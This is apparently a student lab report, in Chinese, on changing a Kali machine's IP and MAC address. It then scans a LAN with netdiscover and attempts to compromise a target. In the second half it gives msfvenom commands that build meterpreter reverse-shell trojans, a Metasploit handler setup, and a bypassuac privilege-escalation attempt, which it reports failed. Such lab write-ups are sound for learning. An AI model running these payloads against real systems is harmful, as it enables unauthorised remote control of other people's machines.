- 尝试修改IP及mac地址实验
- 一、修改IP及mac地址
- 1.修改ip
- (1)原IP为192.168.43.147
- (2)Vim /etc/network/interfaces
- 将ip修改为192.168.43.137
- 输入vim /etc/resolv.conf,修改内容如下
- 再输入service networking restart
- (3)查看修改后的Ip,如下图,由原来的192.168.43.147修改为192.168.43.137
- 2、修改物理地址
- 2.1修改物理地址(永久)
- 输入vim /etc/netwok/interfaces 添加pre-up ifconfig wlan0 hw ether 00:00:00:00:00:11一行,保存并退出。
- (2)输入service networking restart 重启网络服务
- 由上图可知,成功修改物理地址00:0c:29:a2:4d:79------>00:00:00:00:00:11
- 2.2修改物理地址(暂时、随机物理地址 macchager)
- 查看原来的物理地址为00:0c:29:a2:4d:79
- (2)输入airmon-ng stop eth0;ifconfig eth0 down
- 再用命令macchager -r eth0 修改物理地址为随机值 ea:83:58:54:6c:e0
(3)在输入service networking restart后查看本机物理地址
- 由上图可以看出修改物理地址成功:00:0c:29:a2:4d:79 ----->ea:83:58:54:6c:e0
- 2.3修改物理地址(暂时、指定物理地址)
- (1)原物理地址为:00:0c:29:a2:4d:79
(2)使用命令ifconfig eth0 down(关闭eth0网卡)
- 使用命令ifconfig eth0 hw ether 00:00:00:00:00:11 修改物理地址为指定值00:00:00:00:00:11
- 使用命令ifconfig eth0 up(开启eth0网卡)
- 查看修改后的物理地址为00:0c:29:a2:4d:79------>00:00:00:00:00:11
- 二、获取本局域网中其他主机IP,尝试修改
- (1)目的主机ip
- (2)在kali中查看IP为192.168.43.147,在kali中输入netdiscover -i eth0 -r 192.168.43.147
- (3)探测到局域网中存活的主机如下,存在目的主机
- (4)对靶机进行渗透(实验失败)
- 开启服务
- /etc/init.d/apache2 start
- /etc/init.d/postgresql start
- 制作木马文件
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.14 LPORT=1777 -f exe >name.exe
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf
- 并在靶机运行木马文件
- 输入指令
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- //set payload linux/x64/meterpreter/reverse_tcp(linux)
- set LHOST 192.168.43.147主机ip
- set LPORT 1777生成木马程序时候的端口
- 输入shell获得靶机进入靶机的cmd进行IP地址的更改
- 经过尝试发现需要管理员权限进行修改,所以尝试使用getsystem进行再次尝试
- 输入:use exploit/windows/local/bypassuac
- 输入:set LPORT 1777 set session 1 run进行设置发现,由于靶机过于顽固,获取不了管理员权限,改不了ip